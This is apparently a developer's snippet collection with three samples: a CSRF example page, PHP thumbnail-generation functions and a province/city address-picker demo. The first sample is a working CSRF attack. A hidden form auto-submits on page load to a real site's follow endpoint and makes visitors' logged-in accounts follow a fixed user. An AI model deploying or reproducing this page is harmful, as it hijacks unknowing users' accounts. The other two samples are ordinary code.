CSRF攻击范例

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>自动加粉丝</title>
</head>

<body>
<div style="display:none">
<form action="http://t.ci123.com/subs/follow.php" name="addForm" method="post" id="addFans" target="ipost">
<input type="text" name="uid" value="1535917"  />
<input type="text" name="types" value="1" />
</form>
<iframe name="ipost" id="ipost"></iframe>
</div>
<script language="javascript">
document.getElementById("addFans").submit();
</script>
</body>
</html>

php压缩图片函数

/*
*编	写:袁	亮
*时	间:2013-02-27
*功	能:常见的两种缩略图生成策略实现,图片不允许变形,在生成缩略图之前需要确保图片存放目录存在并有写权限
	   可以调用createDirs创建目录并赋予相应的权限,该函数支持多级目录
	   在window下测试时处理大图片可能会出现内存不足,可以使用ini_set('memory_limit', '12M');更改内存限制
*/

function createDirs($dir,$model=0777){//创建多级目录
	return is_dir($dir) or createDirs(dirname($dir),$model) and mkdir($dir,$model);
}
/*
*生成一张给定宽高的缩略图,超出部分进行居中截图,只支持jpg,gif,png格式,生成的是jpg格式图片
@old_src:源图地址
@new_src:缩略图地址
@new_width:缩略图宽
@new_height:缩略图高
@rate:图片质量,0-100,可选参数,默认100
#返回值:1:缩略图生成成功,-1:不支持该图片类型,-2:图片文件错误,-3:缩略图生成失败
*/
function cutPhotoDesign($old_src,$new_src,$new_width,$new_height,$rate=100){
	$old_info = getimagesize($old_src);
	switch($old_info[2]){
		case 1:$im = imagecreatefromgif($old_src);break;
		case 2:$im = imagecreatefromjpeg($old_src);break;
		case 3:$im = imagecreatefrompng($old_src);break;
		default:return -1;
	}
	
	if(!$im){
		return -2;
	}
	$old_width = imagesx($im);
	$old_height = imagesy($im);
	
	if($old_width<=$new_width && $old_height<=$new_height){//图片过小,直接原图显示
		$res = copy($old_src,$new_src);
		imagedestroy($im);
		return $res?1:-3;
	}

	$x_rate = $old_width/$new_width;//计算压缩图片尺寸,以及截图开始位置
	$y_rate = $old_height/$new_height;
	if($x_rate<$y_rate){//宽度优先压缩
		$dst_x = $new_width;
		$dst_y = ceil($old_height/$x_rate);
		$new_start_x = 0;
		$new_start_y = ($dst_y-$new_height)/2;
	}else{//高度优先压缩
		$dst_x = ceil($old_width/$y_rate);
		$dst_y = $new_height;
		$new_start_x = ($dst_x-$new_width)/2;
		$new_start_y = 0;
	}
	
	$newim = imagecreatetruecolor($dst_x,$dst_y);//等比例压缩图片,将图片的宽或者高压缩到指定参数
	imagecopyresampled($newim,$im,0,0,0,0,$dst_x,$dst_y,$old_width,$old_height);

	$cutim = imagecreatetruecolor($new_width,$new_height);//将宽高都固定成指定参数,超出的部分居中截图
	imagecopyresampled($cutim,$newim,0,0,$new_start_x,$new_start_y,$new_width,$new_height,$new_width,$new_height);
	$res = imagejpeg($cutim,$new_src,$rate);//对图像进行截图

	imagedestroy($im);
	imagedestroy($newim);
	imagedestroy($cutim);
	return $res?1:-3;
}
/*
*生成一张宽高不超过给定参数的缩略图,只支持jpg,gif,png格式,生成的是jpg格式图片
@old_src:源图地址
@new_src:缩略图地址
@new_width:缩略图宽
@new_height:缩略图高
@rate:图片质量,0-100,可选参数,默认100
#返回值:1:缩略图生成成功,-1:不支持该图片类型,-2:图片文件错误,-3:缩略图生成失败
*/
function cutPhoto($old_src,$new_src,$new_width,$new_height,$rate=100){
	$old_info = getimagesize($old_src);
	switch($old_info[2]){
		case 1:$im = imagecreatefromgif($old_src);break;
		case 2:$im = imagecreatefromjpeg($old_src);break;
		case 3:$im = imagecreatefrompng($old_src);break;
		default:return -1;
	}
	
	if(!$im){
		return -2;
	}
	$old_width = imagesx($im);
	$old_height = imagesy($im);
	
	if($old_width<=$new_width && $old_height<=$new_height){//图片过小,直接原图显示
		$res = copy($old_src,$new_src);
		imagedestroy($im);
		return $res?1:-3;
	}
	
	$x_rate = $old_width/$new_width;//计算缩略图实际尺寸
	$y_rate = $old_height/$new_height;	
	if($x_rate<$y_rate){
		$dst_x = ceil($old_width/$y_rate);
		$dst_y = $new_height;
	}else{
		$dst_x = $new_width;
		$dst_y = ceil($old_height/$x_rate);
	}
	
	$newim = imagecreatetruecolor($dst_x,$dst_y);//按实际大小生成一张画布
	$bg = imagecolorallocate($newim,255,255,255);//白色背景
	imagecopyresampled($newim,$im,0,0,0,0,$dst_x,$dst_y,$old_width,$old_height);//将图片内容复制到新画布中
	$res = imagejpeg($newim,$new_src,$rate);//将画布中的内容写入文件
	
	imagedestroy($im);
	imagedestroy($newim);
	return $res?1:-3;
}

邮寄地址插件demo范例

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>邮寄地址插件使用范例</title>
</head>

<body>
<form name="recvaddress_form">
<select name="province" onchange="ciarea.selcity(this.value,0);" style="width:80px;"></select> 省
<select name="city" style="width:120px;" onchange="ciarea.selarea(this.value,0);"></select> 市
<select name="area" style="width:120px;"></select> 区
</form>
<script type="text/javascript" src="http://shiyong.ci123.com/district/common.js"></script>
<script type="text/javascript">
window.onload = function(){
//ci_province=11;ci_city=1100;ci_area=41306; //编辑的时候,需要默中省市区的时候设置
ciarea.selprovince(ci_province,ci_city,ci_area);
}
</script>
</body>
</html>